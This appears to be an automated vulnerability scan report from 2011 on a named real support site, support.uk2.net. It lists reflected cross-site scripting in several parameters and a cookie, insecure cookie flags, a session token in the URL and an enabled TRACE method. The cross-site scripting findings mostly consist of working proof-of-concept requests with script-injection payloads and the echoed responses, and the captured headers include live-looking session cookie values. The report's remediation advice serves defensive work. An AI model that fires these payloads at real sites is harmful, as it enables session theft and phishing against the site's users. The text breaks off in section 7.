support.uk2.net, XSS, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Mar 18 16:52:10 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)

1.1. https://support.uk2.net/ [name of an arbitrarily supplied request parameter]

1.2. https://support.uk2.net/index.php [_ca parameter]

1.3. https://support.uk2.net/index.php [name of an arbitrarily supplied request parameter]

1.4. https://support.uk2.net/visitor/index.php [departmentid parameter]

1.5. https://support.uk2.net/visitor/index.php [SWIFT_sessionid80 cookie]

2. SSL cookie without secure flag set

2.1. https://support.uk2.net/

2.2. https://support.uk2.net/visitor/index.php

3. Session token in URL

4. Cookie without HttpOnly flag set

4.1. https://support.uk2.net/

4.2. https://support.uk2.net/visitor/index.php

5. Password field with autocomplete enabled

6. TRACE method is enabled

7. Cacheable HTTPS response

7.1. https://support.uk2.net/

7.2. https://support.uk2.net/favicon.ico

8. Content type incorrectly stated

9. SSL certificate



1. Cross-site scripting (reflected)  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://support.uk2.net/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7390f"><script>alert(1)</script>ba578d2ea54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7390f"><script>alert(1)</script>ba578d2ea54=1 HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.322152152.1300482878.1300482878.1300482878.1; __utmc=1; __utmb=1.4.10.1300482878; controlpanel=252e04460e20e55762b6d51becd6ec5a

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:22:58 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_sessionid40=d90b6f0abe63b99bc144a826e35b46bf; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...
<input type="hidden" name="querystring" value="7390f"><script>alert(1)</script>ba578d2ea54=1">
...[SNIP]...

1.2. https://support.uk2.net/index.php [_ca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /index.php

Issue detail

The value of the _ca request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31506"><script>alert(1)</script>a9eb0d1a0f2 was submitted in the _ca parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?_ca=css31506"><script>alert(1)</script>a9eb0d1a0f2 HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24479

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...
<input type="hidden" name="querystring" value="_ca=css31506"><script>alert(1)</script>a9eb0d1a0f2">
...[SNIP]...

1.3. https://support.uk2.net/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d80"><script>alert(1)</script>6e4124b11d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?_ca/a7d80"><script>alert(1)</script>6e4124b11d6=css HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:23:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24480

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...
<input type="hidden" name="querystring" value="_ca/a7d80"><script>alert(1)</script>6e4124b11d6=css">
...[SNIP]...

1.4. https://support.uk2.net/visitor/index.php [departmentid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /visitor/index.php

Issue detail

The value of the departmentid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8528c"%3balert(1)//c2d8862b644 was submitted in the departmentid parameter. This input was echoed as 8528c";alert(1)//c2d8862b644 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=08528c"%3balert(1)//c2d8862b644&fullname=&email= HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:21:35 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Expires: Sat, 19 Mar 2011 21:21:35 GMT
Cache-Control: max-age=3600, must-revalidate
Set-Cookie: SWIFT_sessionid80=478cacb4994f203a102e9e3f31a65a93; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Connection: close
Content-Type: text/javascript
Content-Length: 10625

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
-500)/2;
   docHeight = (winH-480)/2;
   chatwindow = window.open("https://support.uk2.net/visitor/index.php?_m=livesupport&_a=startclientchat&sessionid="+sessionid+"&proactive="+proactive+"&departmentid=08528c";alert(1)//c2d8862b644&randno="+doRand()+"&fullname=&email=","customerchat"+doRand(), "toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=0,resizable=1,width=500,height=480,left="+docWidth+",top="+docHeight);

...[SNIP]...

1.5. https://support.uk2.net/visitor/index.php [SWIFT_sessionid80 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /visitor/index.php

Issue detail

The value of the SWIFT_sessionid80 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4313f"%3balert(1)//131e4bdf630 was submitted in the SWIFT_sessionid80 cookie. This input was echoed as 4313f";alert(1)//131e4bdf630 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email= HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/index.php?_ca/a7d80%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6e4124b11d6=css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885; __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.3.10.1300482988; controlpanel=252e04460e20e55762b6d51becd6ec5a; splittest=randompassword; SWIFT_sessionid80=ccc3784eb23ca348b6e5c50667b786444313f"%3balert(1)//131e4bdf630; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:37:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Sat, 19 Mar 2011 21:37:26 GMT
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/javascript
Content-Length: 10556

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessionid = "ccc3784eb23ca348b6e5c50667b786444313f";alert(1)//131e4bdf630";
var country = "";
var countrycode = "";
var hasnotes = "";
var campaignid = "";
var campaigntitle = "";
var isfirsttime = 1;
var timer = 0;
var imagefetch = 19;
var image1;
var updateurl = "";
var s
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://support.uk2.net/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.uk2.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.322152152.1300482878.1300482878.1300482878.1; __utmc=1; __utmb=1.4.10.1300482878; controlpanel=252e04460e20e55762b6d51becd6ec5a

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_sessionid40=0a0f277c21f645c6892c8d9725b29eb3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...

2.2. https://support.uk2.net/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.uk2.net
Path:   /visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email= HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Expires: Sat, 19 Mar 2011 21:20:41 GMT
Cache-Control: max-age=3600, must-revalidate
Set-Cookie: SWIFT_sessionid80=5729744ea284855d05e7e0bc8584f62c; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Connection: close
Content-Type: text/javascript
Content-Length: 10529

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...

3. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.uk2.net
Path:   /visitor/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /visitor/index.php?_m=livesupport&_a=updatefootprint&time=1300483058726&rand=39&url=https%3A//support.uk2.net/&isfirsttime=0&sessionid=10b9c0108972703c68b5e1555f596542&referrer=&resolution=1920x1156&colordepth=16&platform=Win32&appversion=5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%29%20AppleWebKit/534.16%20%28KHTML%2C%20like%20Gecko%29%20Chrome/10.0.648.151%20Safari/534.16&appname=Netscape&browsercode=SF&browserversion=5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%29%20AppleWebKit/534.16%20%28KHTML%2C%20like%20Gecko%29%20Chrome/10.0.648.151%20Safari/534.16&browsername=Safari&operatingsys=Windows&pagetitle=Help%20and%20support%2024%20hours%20a%20day.%20Raise%20a%20ticket%2C%20call%20us%20on%200905%20168%200086%20or%20check%20our%20FAQ%27s%20%7C%20UK2&country=&countrycode=&hasnotes=0&campaignid=&campaigntitle= HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885; SWIFT_sessionid80=10b9c0108972703c68b5e1555f596542; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.3.10.1300482988; controlpanel=252e04460e20e55762b6d51becd6ec5a; splittest=randompassword

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:16:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 18 Mar 2011 21:16:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 44
Connection: close
Content-Type: image/gif

GIF89a.............!.......,............o..;

4. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://support.uk2.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.uk2.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.322152152.1300482878.1300482878.1300482878.1; __utmc=1; __utmb=1.4.10.1300482878; controlpanel=252e04460e20e55762b6d51becd6ec5a

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_sessionid40=0a0f277c21f645c6892c8d9725b29eb3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...

4.2. https://support.uk2.net/visitor/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.uk2.net
Path:   /visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email= HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Referer: https://support.uk2.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Expires: Sat, 19 Mar 2011 21:20:41 GMT
Cache-Control: max-age=3600, must-revalidate
Set-Cookie: SWIFT_sessionid80=5729744ea284855d05e7e0bc8584f62c; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Connection: close
Content-Type: text/javascript
Content-Length: 10529

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...

5. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET / HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.322152152.1300482878.1300482878.1300482878.1; __utmc=1; __utmb=1.4.10.1300482878; controlpanel=252e04460e20e55762b6d51becd6ec5a

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_sessionid40=0a0f277c21f645c6892c8d9725b29eb3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="6"><form name="loginform" action="https://support.uk2.net/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

6. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: support.uk2.net
Cookie: ecb9e3a99b7eb6d4

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:28 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.uk2.net
Cookie: ecb9e3a99b7eb6d4


7. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

